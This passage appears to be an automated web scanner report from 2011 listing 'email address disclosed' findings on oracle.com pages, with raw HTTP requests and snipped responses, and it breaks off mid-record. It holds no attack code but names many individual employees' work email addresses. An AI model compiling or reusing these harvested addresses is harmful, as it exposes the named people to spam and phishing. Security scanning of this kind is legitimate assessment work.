...[SNIP]...
<a href="mailto:partnerbusinesscenter-dk_ww@oracle.com">partnerbusinesscenter-dk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ec_ww@oracle.com">partnerbusinesscenter-ec_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ee_ww@oracle.com">partnerbusinesscenter-ee_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dk_ww@oracle.com">partnerbusinesscenter-dk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-aunz_ww@oracle.com">partnerbusinesscenter-aunz_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fi_ww@oracle.com">partnerbusinesscenter-fi_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-de_ww@oracle.com">partnerbusinesscenter-de_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-gr_ww@oracle.com">partnerbusinesscenter-gr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dk_ww@oracle.com">partnerbusinesscenter-dk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-hk_ww@oracle.com">partnerbusinesscenter-hk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-hu_ww@oracle.com">partnerbusinesscenter-hu_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dk_ww@oracle.com">partnerbusinesscenter-dk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-in_ww@oracle.com">partnerbusinesscenter-in_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-id_ww@oracle.com">partnerbusinesscenter-id_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ie_ww@oracle.com">partnerbusinesscenter-ie_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-it_ww@oracle.com">partnerbusinesscenter-it_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:opn-office_jp@oracle.com">opn-office_jp@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-kz_ww@oracle.com">partnerbusinesscenter-kz_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-kr_ww@oracle.com">partnerbusinesscenter-kr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-gs_ww@oracle.com">partnerbusinesscenter-gs_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-lv_ww@oracle.com">partnerbusinesscenter-lv_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-lt_ww@oracle.com">partnerbusinesscenter-lt_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-lu_ww@oracle.com">partnerbusinesscenter-lu_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-hk_ww@oracle.com">partnerbusinesscenter-hk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-mk_ww@oracle.com">partnerbusinesscenter-mk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-my_ww@oracle.com">partnerbusinesscenter-my_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-mt_ww@oracle.com">partnerbusinesscenter-mt_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-mx_ww@oracle.com">partnerbusinesscenter-mx_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ua_ww@oracle.com">partnerbusinesscenter-ua_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-nl_ww@oracle.com">partnerbusinesscenter-nl_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-aunz_ww@oracle.com">partnerbusinesscenter-aunz_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-no_ww@oracle.com">partnerbusinesscenter-no_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-gs_ww@oracle.com">partnerbusinesscenter-gs_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-aunz_ww@oracle.com">partnerbusinesscenter-aunz_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dsur_ww@oracle.com">partnerbusinesscenter-dsur_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-pe_ww@oracle.com">partnerbusinesscenter-pe_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ph_ww@oracle.com">partnerbusinesscenter-ph_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-pl_ww@oracle.com">partnerbusinesscenter-pl_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-pt_ww@oracle.com">partnerbusinesscenter-pt_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-gs_ww@oracle.com">partnerbusinesscenter-gs_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ro_ww@oracle.com">partnerbusinesscenter-ro_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ru_ww@oracle.com">partnerbusinesscenter-ru_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-rs_ww@oracle.com">partnerbusinesscenter-rs_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sg_ww@oracle.com">partnerbusinesscenter-sg_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sk_ww@oracle.com">partnerbusinesscenter-sk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-si_ww@oracle.com">partnerbusinesscenter-si_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-es_ww@oracle.com">partnerbusinesscenter-es_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-se_ww@oracle.com">partnerbusinesscenter-se_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-chde_ww@oracle.com">partnerbusinesscenter-chde_ww@oracle.com</a> <br /><a href="mailto:partnerbusinesscenter-chfr_ww@oracle.com">partnerbusinesscenter-chfr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tw_ww@oracle.com">partnerbusinesscenter-tw_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-th_ww@oracle.com">partnerbusinesscenter-th_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ua_ww@oracle.com">partnerbusinesscenter-ua_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-gs_ww@oracle.com">partnerbusinesscenter-gs_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-uk_ww@oracle.com">partnerbusinesscenter-uk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-nas_ww@oracle.com">partnerbusinesscenter-nas_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dsur_ww@oracle.com">partnerbusinesscenter-dsur_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ve_ww@oracle.com">partnerbusinesscenter-ve_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-vn_ww@oracle.com">partnerbusinesscenter-vn_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...

22.63. http://www.oracle.com/technetwork/oramag/magazine/home/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/oramag/magazine/home/index.html

Issue detail

The following email addresses were disclosed in the response:

opubedit_us@oracle.com
jennifer.hamilton@oracle.com

Request

GET /technetwork/oramag/magazine/home/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41075635268300620,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="mailto:opubedit_us@oracle.com">opubedit_us@oracle.com</a>
...[SNIP]...
<a href="mailto:jennifer.hamilton@oracle.com">jennifer.hamilton@oracle.com</a>
...[SNIP]...

22.64. http://www.oracle.com/us/assets/masterhp.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/assets/masterhp.js

Issue detail

The following email address was disclosed in the response (in a developer comment at the top of the script):

santhosh.shanmugasundaram@oracle.com

Request

GET /us/assets/masterhp.js HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: Application/js
SS_FRIENDLY_EXT: js
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=300+0;age=0;ecid=41041090844582734,0:1)
Content-Length: 6698
Date: Tue, 06 Sep 2011 15:53:59 GMT
Connection: close

//    Author: santhosh.shanmugasundaram@oracle.com
//    Created Date: 3.9.2009
//    Revisions: v 1.0
/* Start Rotating banner code */

var theImage = new Array()
theImage[0] = 'one_on'
theImage[1] = 'two_on'
theImage[2] = 'three_on'
theImage[3]
...[SNIP]...

22.65. http://www.oracle.com/us/ciocentral/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/ciocentral/index.html

Issue detail

The following email address was disclosed in the response (as a mailto: target carrying a ?subject= parameter):

indy.kooiker@oracle.com

Request

GET /us/ciocentral/index.html?origref=http://www.oracle.com/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/cio/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gpv_p24=no%20value; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343430587; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.oracle.com%25252Findex.html%252523%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35988164901865103,0:1)
Content-Length: 15880
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:10:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html;
...[SNIP]...
<a href="mailto:indy.kooiker@oracle.com?subject=CIO Website Contact">
...[SNIP]...

22.66. http://www.oracle.com/us/corporate/Acquisitions/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/Acquisitions/index.html

Issue detail

The following email address was disclosed in the response:

acquisition-inquiries_ww@oracle.com

Request

GET /us/corporate/Acquisitions/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35759105706347886,0:1)
Date: Tue, 06 Sep 2011 16:15:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 155856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:acquisition-inquiries_ww@oracle.com">
...[SNIP]...
<a href="mailto:acquisition-inquiries_ww@oracle.com">
...[SNIP]...

22.67. http://www.oracle.com/us/corporate/analystrelations/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/analystrelations/index.html

Issue detail

The following email addresses were disclosed in the response:

carol.sato@oracle.com
claire.dessaux@oracle.com
brenda.connor@oracle.com
carla.croghan@oracle.com
paul.j.phillips@oracle.com
terina.doherty@oracle.com
toshiaki.hine@oracle.com
karen.bitran@oracle.com
emilia.wasiak@oracle.com
alison.odonnell@oracle.com

Request

GET /us/corporate/analystrelations/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=40288174477304969,0:1)
Date: Tue, 06 Sep 2011 16:15:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:carol.sato@oracle.com">carol.sato@oracle.com</a>
...[SNIP]...
<a href="mailto:claire.dessaux@oracle.com">claire.dessaux@oracle.com</a>
...[SNIP]...
<a href="mailto:brenda.connor@oracle.com">brenda.connor@oracle.com</a>
...[SNIP]...
<a href="mailto:claire.dessaux@oracle.com">claire.dessaux@oracle.com</a>
...[SNIP]...
<a href="mailto:carla.croghan@oracle.com">carla.croghan@oracle.com</a>
...[SNIP]...
<a href="mailto:paul.j.phillips@oracle.com">paul.j.phillips@oracle.com</a>
...[SNIP]...
<a href="mailto:terina.doherty@oracle.com">terina.doherty@oracle.com</a>
...[SNIP]...
<a href="mailto:toshiaki.hine@oracle.com">toshiaki.hine@oracle.com</a>
...[SNIP]...
<a href="mailto:karen.bitran@oracle.com">karen.bitran@oracle.com</a>
...[SNIP]...
<a href="mailto:emilia.wasiak@oracle.com">emilia.wasiak@oracle.com</a>
...[SNIP]...
<a href="mailto:alison.odonnell@oracle.com">alison.odonnell@oracle.com</a>
...[SNIP]...

22.68. http://www.oracle.com/us/corporate/citizenship/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/citizenship/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/corporate/citizenship/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41181377363497473,0:1)
Date: Tue, 06 Sep 2011 16:15:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="mailto:citizenship_ww@oracle.com">citizenship_ww@oracle.com</a>
...[SNIP]...

22.69. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/customers/oracle-users-groups-192206.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/corporate/customers/oracle-users-groups-192206.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=65;ecid=41091264654533117,0:1)
Date: Tue, 06 Sep 2011 16:13:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:Oracleusergroup_ww@oracle.com">Oracleusergroup_ww@oracle.com</a>
...[SNIP]...

22.70. http://www.oracle.com/us/corporate/insight/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/insight/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/corporate/insight/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
